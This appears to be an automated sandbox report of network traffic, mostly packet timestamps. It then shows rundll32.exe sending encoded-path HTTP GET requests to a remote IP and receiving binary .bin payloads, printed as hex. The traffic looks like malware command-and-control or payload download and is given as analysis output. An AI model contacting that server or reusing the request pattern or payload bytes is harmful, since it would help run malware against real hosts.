                        May 25, 2022 11:27:27.353950024 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.353957891 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.354001999 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.354005098 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.354027987 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.354042053 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.354085922 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.355632067 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355663061 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355688095 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355710983 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355732918 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355742931 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.355758905 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355784893 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355789900 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.355794907 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.355803013 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.355818987 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.355829000 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.355854034 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.355878115 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.355880022 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.355885029 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.355902910 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.355922937 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.355927944 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.355928898 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.355954885 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.355978012 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.355978966 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.355983973 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356004953 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356021881 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356040955 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356044054 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356056929 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356066942 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356089115 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356103897 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356110096 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356117010 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356132984 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356152058 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356167078 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356169939 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356173038 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356178045 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356192112 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356205940 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356209040 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356231928 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356245995 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356251955 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356256008 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356278896 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356298923 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356314898 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356333971 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356336117 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356340885 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356353045 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356374025 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356389046 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356394053 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356395960 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356398106 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356416941 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356437922 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356446028 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356451988 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356460094 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356488943 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356493950 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356502056 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356503010 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356525898 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356540918 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356559992 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356581926 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356604099 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356611967 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356616020 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356626034 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356648922 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356653929 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356657028 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356672049 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356693029 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356693983 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356697083 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356718063 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356739044 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356753111 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.356782913 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356787920 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.356791019 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.357369900 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.357399940 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.357431889 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.357453108 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.357475042 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.357496023 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.357505083 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.357518911 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.357542992 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.357558966 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.357559919 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.357563972 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.357567072 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.357588053 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.360047102 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.360075951 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.360094070 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.360229015 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.363274097 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.363343000 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.363362074 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.363379955 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.363399982 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.363425016 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.363450050 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.363473892 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.363481998 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.363492012 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.363497019 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.363516092 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:27.363547087 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.363554001 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:27.363888025 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:28.182548046 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:27:28.200694084 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:28.475930929 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:28.475972891 CEST  80     49771  176.10.119.68  192.168.2.4
                        May 25, 2022 11:27:28.476161957 CEST  49771  80     192.168.2.4    176.10.119.68
                        May 25, 2022 11:28:32.470417976 CEST  49771  80     192.168.2.4    176.10.119.68
                        • 176.10.119.68
                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                        0           192.168.2.4  49771        176.10.119.68   80                C:\Windows\SysWOW64\rundll32.exe
                        Timestamp  kBytes transferred  Direction  Data
                        May 25, 2022 11:27:26.119944096 CEST  1245  OUT  GET /drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZd85/z64fb0RLSddtHF/rHMZD1_2FqMPdbWOBNRMe/v9EppSM4NhIsm8SQ/XAUtOy4sCW68iNX/Cmaw_2Ff5hh5_2FyXv/eA_2Fri4K/swu3zwi7P_2FcYbL_2Bx/W02PomqcfEjRbitbvf6/IXpVMOx_2BSCAzr10HE5Rp/jnPQORhN2og07/6kVbs5lO/NwTvbwc1Won8BiTcK1YZBEd/L7l.jlk HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: 176.10.119.68
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        May 25, 2022 11:27:26.411830902 CEST  1246  IN  HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 25 May 2022 09:27:26 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 186012
                        Connection: keep-alive
                        Pragma: public
                        Accept-Ranges: bytes
                        Expires: 0
                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                        Content-Disposition: inline; filename="628df67e5f6a8.bin"
                        Data Raw: ea bd a2 1d 3e 3e d3 c3 36 c2 dd da f9 57 fc d3 3c f1 a8 93 93 9a cc 6b a2 b4 af 06 ab bc f8 6a 05 ce f7 96 f1 3f 92 c2 32 8e e8 dd cd 51 6d 66 73 db 65 23 2e 01 e2 ab d1 c0 2c 7a 98 76 f4 7c db 33 4f 47 9b 24 97 a1 68 86 78 b3 18 9a e0 58 ba 3a d9 a0 b3 e4 ed a3 a1 37 7e ad d4 3c 43 bd bd 87 f8 df 34 f6 66 6e 90 b2 b3 64 aa ab b2 74 71 82 14 a2 e0 67 25 ba bc cb d1 3c e7 39 fb 54 34 9e 24 19 e7 ae ea 73 93 a9 86 2a ed 26 2d c4 d8 05 31 6d a8 65 d4 e4 c6 08 11 b1 eb 4a 99 c7 4e 4b 51 cb 0c 94 14 90 e3 13 f2 a6 e1 0c 74 e7 a5 b7 7c 48 e6 da 7c 05 c4 bd fc cf a6 d8 ec 60 7a 35 23 aa 05 1c 1b 74 8b ac 40 9d 74 56 c8 13 e3 0e e1 23 1d 6a 7b 45 35 a8 08 41 72 20 62 65 70 03 a8 6d 19 d3 e8 78 ab eb 3c 90 9b de a0 93 90 e3 6d 51 e1 fb 4c 46 cd 28 aa 05 03 69 5e eb b1 b9 c8 69 c0 bb 3d ff 38 7a 5f bc bb 7b ce d2 d2 17 06 07 55 8b b1 51 3f 7e f3 df 05 d8 b0 ad da 1b 94 75 a1 b9 63 1d d1 a5 16 14 b5 59 f9 52 f0 ec 28 a9 53 6d bd 23 5b db 85 59 a8 d3 a6 76 98 0e b0 1d 57 8f 69 0e 87 bc 26 00 84 a4 5f 83 c3 4d 38 9e 3a 11 60 12 9c a3 7c 11 3c 36 d2 1d 29 c0 ef 89 ca 90 c9 b5 98 74 eb e9 ff e9 e4 c0 a3 7c 74 59 de 3a b3 bc 0c 13 48 ea 7e 08 80 f1 aa 94 73 9d 49 f5 87 4f 36 bf 42 b5 9a 68 36 fb 2b e5 d1 33 bf f9 d9 36 0c c6 bf 84 a3 48 a2 02 df a9 25 3c 25 d0 9d 0a 6e 11 84 24 91 8f b9 3a 9e f6 24 9f ce 71 b7 f8 84 87 81 91 78 fa 70 5e 73 8e de 97 9d 54 ba 72 b6 da b9 fe 3c bf d5 cd 31 eb 9b b2 5f dd 67 84 2a 13 f5 21 c7 67 df 1d 8a 41 7a 1e cf f5 4c 54 89 a0 b3 c4 af b5 e2 a9 ae 0a 94 e8 7a 92 4d d7 44 b9 87 dd 6b 5e ae eb ca 1a f8 a6 78 89 03 a1 61 8b 01 f0 80 89 5e 03 2d ed 92 a1 93 17 ed 95 5e c5 ff 84 0e 82 ae 1b 4b ee b3 75 3e 26 3e 2b be 39 29 6d 2d e7 92 a3 f9 f6 07 02 6f 9b 8e 36 73 69 15 fc e4 93 2e 07 a6 f4 96 76 61 96 9d 31 e9 17 40 2d 2c 9e da c5 f8 c0 06 63 7b a1 f1 fd c7 b7 90 a0 66 8a 89 3f 05 83 f4 a7 11 a1 6c ee f2 fd b0 2a 61 4a 6d ac 4f c7 c5 83 96 04 38 6f 1f c0 f4 d6 9c 43 9b a6 f8 98 98 41 56 a7 bf 62 e4 8f 4c 8f d9 33 89 
de df bd 1c e7 75 47 56 fb 6e a7 c6 4e 41 11 45 91 45 9c 65 42 50 9a 50 b0 89 91 5d 9a 3d 6d 94 24 21 b0 23 c5 42 d0 ec 3c 73 12 1c 4b 77 16 c7 e6 fb ae 2f 99 5b 98 41 9a 0f 93 47 20 d3 c0 cc a1 26 fa 0e 0a 55 41 b3 00 55 8d b0 fb a9 ef 8e 6d fc 70 9c 26 04 b7 c0 45 b3 e4 43 94 bd 47 2b 41 4c 72 40 35 3f d8 2a e2 da 64 9e 70 d3 a6 c5 99 4b b8 78 f8 e3 7e 09 0a e3 ac 02 de 72 1a 94 51 8c e9 23 b6 74 72 b4 59 ea 6a 95 b8 25 0f 92 0c f5 f0 1d c3 72 c4 bc 33 0c d5 af b5 03 c6 b8 d8 a0 1a 3c d4 75 f1 c8 d6 e0 1b 85 fc bb 5d e9 65 13 f9 72 fb 1c f8 5b 14 d6 b2 f2 2b 3c d3 49 23 64 ba 0a 35 c6 7b 57 37 0b da 94 27 53 89 b4 b4 b0 49 f5 9a d8 d8 06 8e ab c0 c6 2d 0d f3 78 8b 28 66 b4 85 bc 35 14 e2 1c b9 46 20 81 05 1a ec 2d 7a 88 2e 6b 02 7e 9f 13 35 e8 fe 19 8f b0 5d 05 9b f2 e5 bb 53 fd 75 f0 f7 89 f7 c2 f5 19 e2 00 51 d5 a1 42 19 73 0f ff 48 80 f3 4d 01 ab 61 12 fb 06 1f 4e 65 4a 3c 07 ec 30 1c a5 bf c3 12 a8 0d c6 69 cc c0 4e 44 84 8c 1c 77 31 25 9f 83 8a 18 4a d3 e3 fc c3 e6 79 21 67 3e 95 66 d4 97 b2 65 64
                        Data Ascii: >>6W<kj?2Qmfse#.,zv|3OG$hxX:7~<C4fndtqg%<9T4$s*&-1meJNKQt|H|`z5#t@tV#j{E5Ar bepmx<mQLF(i^i=8z_{UQ?~ucYR(Sm#[YvWi&_M8:`|<6)t|tY:H~sIO6Bh6+36H%<%n$:$qxp^sTr<1_g*!gAzLTzMDk^xa^-^Ku>&>+9)m-o6si.va1@-,c{f?l*aJmO8oCAVbL3uGVnNAEEeBPP]=m$!#B<sKw/[AG &UAUmp&ECG+ALr@5?*dpKx~rQ#trYj%r3<u]er[+<I#d5{W7'SI-x(f5F -z.k~5]SuQBsHMaNeJ<0iNDw1%Jy!g>fed
                        May 25, 2022 11:27:26.411885023 CEST  1247  IN  Data Raw: 3b 71 e0 49 53 4e 7c ba cb 3a a1 08 b2 64 48 5c c5 61 9d 5b 9f 3d b2 01 89 e8 1c 80 5b 82 e2 bb 9d af 0d 2b 80 c6 54 dd 97 e7 a2 39 7c 56 42 ec 15 ad 74 c0 26 63 68 fe bd d7 5e d4 37 99 63 c5 d7 95 6c e2 c6 61 04 41 10 03 22 69 df ad 41 8b 03 91
                        Data Ascii: ;qISN|:dH\a[=[+T9|VBt&ch^7claA"iA?8PXON?cx@XU7Kv{31/\1/))6zr3;lXaoZQzb1(xF-N3Y=|]!{)<chq^!nfU<SIOWUr0T#P<Z3V>]
                        May 25, 2022 11:27:26.412241936 CEST  1249  IN  Data Raw: fb 64 d4 80 13 bf 23 ac 9d 09 91 17 de 02 1d bc 7c d5 48 7c cc 7b 81 ed eb 85 40 b2 94 dc fc d1 07 a5 f5 bb 4d f0 1b 35 b1 cb 1e dc d1 a5 fe 32 64 1e f8 8d c6 2b fd 03 b4 09 fc ed 84 fa 70 1a 0f 61 62 d7 c4 5f f0 97 30 64 bc 91 0f d2 71 f9 1c 87
                        Data Ascii: d#|H|{@M52d+pab_0dq/d+/w` S~vVvm;:o:.\_*~\)u75O:q})_p*E;=`Xsk{\^
                        May 25, 2022 11:27:26.412262917 CEST  1250  IN  Data Raw: df 1b c7 d9 4f d6 de 2b 74 4a 6d 5d a5 00 dd 23 ac 94 5d c2 41 2d 49 58 78 54 98 06 a1 3a 36 17 8b 5d 7c 02 c5 68 df f8 c7 42 37 de f6 14 01 b6 10 cd 53 45 92 df 32 ba 20 a5 10 ee 7f 13 e1 60 ca ad 53 1f a7 b0 97 51 91 45 e3 66 92 77 9e 50 d6 f1
                        Data Ascii: O+tJm]#]A-IXxT:6]|hB7SE2 `SQEfwP&7a$hG>O@:.rU9b4u(0j8fJJ^|-Z%f[H|'$_#.'6j5y4Ut62rv%lHF0lW@
                        May 25, 2022 11:27:26.412427902 CEST  1252  IN  Data Raw: 64 09 ca 53 d9 c4 0e ec f7 05 3c 71 43 d5 15 2c 2a 35 74 f8 72 cf e5 03 5c bf cb d5 e4 39 28 a8 2c 13 dc 10 c5 0a 48 8d 52 91 cf 74 28 c9 3b 12 fd 51 bb 03 09 f7 c0 c9 dd d7 71 b1 1d 5e b8 22 f3 cf 91 38 e9 a6 ea c4 e3 5c e3 ee c9 01 1b 2d da e1
                        Data Ascii: dS<qC,*5tr\9(,HRt(;Qq^"8\-U20jX;,w_OqPmU<7]1n0;LAw;#+Os|-xT`C,;Rnk<%m|r>O$fN%?w5c
                        May 25, 2022 11:27:26.412446022 CEST  1253  IN  Data Raw: 28 ef 65 70 ce e9 bb fa b0 ed cc 15 cf 2a 4c 8d 01 1f 96 1b 80 02 d9 88 fa 88 f1 01 a7 9e 2c 6c 8e e8 c2 84 6b 00 48 b0 b5 81 c4 7d f6 4c f6 79 83 97 81 88 cc 0b 97 34 dd 71 96 e6 4d 23 b8 5e 6a 15 e9 76 2f a0 09 3e c5 2c 27 fa bd b6 2f dd 2c 04
                        Data Ascii: (ep*L,lkH}Ly4qM#^jv/>,'/,b9TIYrOzLN0*H^#xJ]0LgDAh@@-km8HUk_HK=%#w-b|^:rDg'$0n_p5KPUYYF$(Np
                        May 25, 2022 11:27:26.412524939 CEST  1254  IN  Data Raw: 4c 88 4d e6 74 a2 c9 71 8e 72 92 fb 93 91 5c 7c e9 62 31 ee 26 86 6b 90 4c 25 8f 8a f8 67 9e 02 3f 8c 11 f8 86 fd 45 c9 a4 3d d8 c9 5e 92 21 37 f0 d3 9f fe 27 72 bc de bc ea 8d a4 1d fb f4 f9 29 85 86 6b 20 7e 5e 25 f1 ea d9 a4 4d fa a6 88 d6 1f
                        Data Ascii: LMtqr\|b1&kL%g?E=^!7'r)k ~^%ML&B*blBTfg@^`)%_KVJR$bG|9zVo4/Ld=Y>!89>M(
                        May 25, 2022 11:27:26.412811995 CEST  1255  IN  Data Raw: eb 3a 24 24 36 ca c4 75 fb e4 68 8c 2e d3 0b a5 cc 37 34 2d 8b 27 da f8 97 de 64 79 45 9e 3c 80 f0 76 82 e0 46 8d e4 a7 ba 8e ed 3b 53 5b c1 1a 39 06 2d ad ca 9c e8 2f 15 33 48 06 59 80 c6 61 ae 0b 76 a9 12 99 91 75 59 91 dc 0a fa d5 19 b6 e1 9a
                        Data Ascii: :$$6uh.74-'dyE<vF;S[9-/3HYavuY#Ds!X+hd-.2j[AkKzAhdl!>Ybe2^{~s~%9h%G?faO2=Zx|*dPiA%N!L|T62"K1QM#
                        May 25, 2022 11:27:26.412832022 CEST  1256  IN  Data Raw: 6d d8 45 7c 7b 5b b5 28 92 08 60 9e 79 28 1c 20 83 e8 7a 1f 54 49 cf 81 c5 0b c5 87 83 72 57 6e d2 f2 86 90 75 71 0d b7 52 c5 eb 4d ae 67 65 f7 84 ef 98 ae e2 e9 45 33 f9 0e c4 91 aa d9 19 0d 19 89 e4 08 cb ca f9 5f f2 43 65 59 d9 e5 34 da d7 72
                        Data Ascii: mE|{[(`y( zTIrWnuqRMgeE3_CeY4rz|Qo[aW~QUb\5&'j%PPKryq6aoMZb4|ptoZ]E+?nMjC1yc`|xt!mv_
                        May 25, 2022 11:27:26.412903070 CEST  1258  IN  Data Raw: 44 ef e1 56 15 16 d7 41 97 35 bd a6 73 a4 11 c2 bc 99 4a e6 73 c8 b1 51 97 a5 3d b6 04 d6 e5 d0 06 09 69 94 78 2b d4 d3 a4 24 73 dd 9c 45 3a 19 7a 34 32 12 fe 71 8c cd 65 86 1b 69 3a c8 1f 34 27 dd dd 16 6e 66 46 fb d0 c0 9a 26 af 8f b4 06 2c e5
                        Data Ascii: DVA5sJsQ=ix+$sE:z42qei:4'nfF&,>$eq}]_9\PoqnFi/d.U*7%(>puE:%Ak\Ep!%i?Ss5UicM(-1oRNin[`Sal
                        May 25, 2022 11:27:26.431308031 CEST  1259  IN  Data Raw: 12 8a 55 51 74 82 c0 b0 4b 66 cf d6 53 f1 a2 e8 63 67 49 59 4d cd 4c 0a c5 85 c3 78 59 6a 61 ce c6 4c c7 7e 51 11 c7 c8 67 04 e2 7f a6 59 6f f4 de 9e 2a b6 a7 ee 67 59 e5 b5 97 bc 0d 8f ad fc b0 b0 60 b7 c3 fd 4c b5 2b d6 3f 98 33 87 dd 67 96 9e
                        Data Ascii: UQtKfScgIYMLxYjaL~QgYo*gY`L+?3gFoZ!X*KKW6L.Hz)YpL:XDRhHXnm2<tK^*X&/6>|k<d;IzLalar?]_AKQ B*
                        May 25, 2022 11:27:27.011665106 CEST  1443  OUT  GET /drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco/TjSDtFakSde/soGhjhBV5Tb5mX/q7nM_2FDyGsXlD3E3A4fe/_2ByGCIGrgekC2k4/_2BIghzEoEtICMG/eMdl_2FVYz1Gzr3rXb/6bQxvF882/0gJazcAIQC6vmyI4DEnR/k0LRXXmFX8YlpSLVUNq/6DaeywiN2GwHaJFGl8Ik7G/m9UBKgfO4ybSV/fnhYeS0x/hab1JQvgZCtDWyU/A.jlk HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: 176.10.119.68
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        May 25, 2022 11:27:27.299287081 CEST  1444  IN  HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 25 May 2022 09:27:27 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 238736
                        Connection: keep-alive
                        Pragma: public
                        Accept-Ranges: bytes
                        Expires: 0
                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                        Content-Disposition: inline; filename="628df67f44836.bin"
                        Data Raw: 77 23 28 92 02 ab 89 1f 5f 83 9b 9c dd 81 51 65 54 10 d3 af 4b a6 45 ed 4e 1f a1 c3 01 69 7d 5a bf 5b 1e 82 db 9c 68 a5 6c 5f b0 75 f6 0f b7 c6 a1 bd 5b 3a a6 23 97 c6 03 43 dd 6d c5 b0 87 f4 4d 2f 4b 42 12 50 ad 5d dc 48 86 7c 01 77 de d8 da aa f9 03 76 23 01 98 69 2c 89 0d d3 12 46 ac 39 36 aa 08 9a ea 7b a2 bb dc a7 78 26 04 8f 03 9d 87 34 1c aa 22 b0 6e 13 c3 27 44 5f c7 24 c4 22 e2 5b 96 27 30 31 bb 1b 43 2a 2b e9 3d ff bf 61 0c 7f ea 6f 0e 70 66 5a db cb ba d0 e3 0b ba 9e 5b a1 9b a4 95 7b 3a af ed 6f 61 0b 44 d3 2f c6 1e 90 51 c3 c1 c5 89 c2 6d 83 89 b6 90 00 46 d8 4f 01 66 2b 12 85 9c 8f d3 8f 99 d3 46 32 cb 96 9a 6b dd cf fe 1c 68 56 94 4b 48 55 a4 e6 cf 41 29 29 d6 3f 70 a3 26 e9 4e 34 40 ee c9 1d 0e 80 a9 ee c7 7a 15 78 bb bf d4 ec 56 96 fc b3 5d f9 a6 3e 05 30 4f 9f 5c 66 3e 5d e6 1d c5 5a 9c 9d 23 2f b4 5d 1f b9 cd 29 a3 ad f1 1a cb e2 ab f1 81 3d 6d 7a 1d 3e 8a a3 3b e9 fb 87 8f fc 55 17 a1 b6 0c 89 45 2a 96 0b 51 b7 4d f6 46 12 eb 91 18 82 15 7a cf 3a 6f 8e 28 7e ff db 55 bb 2e f7 9c 64 d4 da c5 c4 bb cb 89 cb 43 9f dc 7c 48 7a e6 2d 12 da 8c f4 44 f2 d1 08 29 69 75 0e 2d b9 ce f8 bb 06 26 10 21 0c c0 5e 42 85 6b 23 78 75 ec 94 8a 35 30 17 2d 5c 3c 93 2f 93 f9 96 23 1c f8 b6 84 ef ea 0c aa ad 1c 54 4f ed f5 0e 13 b0 3c cf 20 9a e4 46 5f c4 1d ea 00 d9 51 80 9f e6 4a b6 f2 68 bb 5b dd 53 ba eb d3 26 db 92 4a d0 73 5e 9b 1b 33 dc ab 4e 0b 55 13 81 ae fd 77 49 bc 01 ec 4b f9 09 ea 60 dd ea 46 2a 25 13 25 b3 bb 18 3c 3f 70 76 5a 9a 93 33 45 46 3f f0 c7 5b 9d a3 49 72 e5 8c 25 f1 cf f0 a6 dd ce 07 77 b5 9f 3e ea fc 4e 8c af f2 8c 21 b5 b6 7f d7 66 a5 79 fd 81 e3 a0 dd 10 04 59 d0 1c 92 2d bc 1f 62 e4 f2 00 73 91 bc 71 bc 20 06 ce 41 6a 6a 9a ee b9 fa 54 72 92 00 0c 49 27 e1 ba f1 5c 1c 06 